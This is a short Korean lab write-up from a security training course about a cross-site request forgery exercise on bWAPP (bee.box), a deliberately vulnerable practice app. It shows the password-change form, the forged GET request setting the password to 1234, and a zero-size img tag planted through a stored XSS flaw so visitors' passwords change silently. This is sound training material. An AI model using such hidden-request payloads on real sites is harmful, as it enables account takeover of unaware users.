[SK shieldus Rookies 19기] bWAPP bee.box - 크로스 사이트 요청 위조 (CSRF)

[SK쉴더스 Rookies 19기] 클라우드 기반 스마트 융합보안 과정

---

01. CSRF (Change Password)

 로그인된 사용자의 비밀번호를 변경 가능

 

	<form action="/bWAPP/csrf_1.php" method="GET">
        
        <p><label for="password_new">New password:</label><br>
        <input type="password" id="password_new" name="password_new"></p>

        <p><label for="password_conf">Re-type new password:</label><br>
        <input type="password" id="password_conf" name="password_conf"></p>  

        <button type="submit" name="action" value="change">Change</button>   

    </form>

페이지를 확인해보면.. 비밀번호를 1234로 바꾸는 요청은

http://bee.box/bWAPP/csrf_1.php?password_new=1234&password_conf=1234&action=change

 

해당 요청을 이전에 stored xss 취약점이 있었던 페이지에 삽입해보자

<img src="http://bee.box/bWAPP/csrf_1.php?password_new=1234&password_conf=1234&action=change" width="0" height"0" />

 

bee/bug로 로그인 안됨(비밀번호 1234로 변경됨)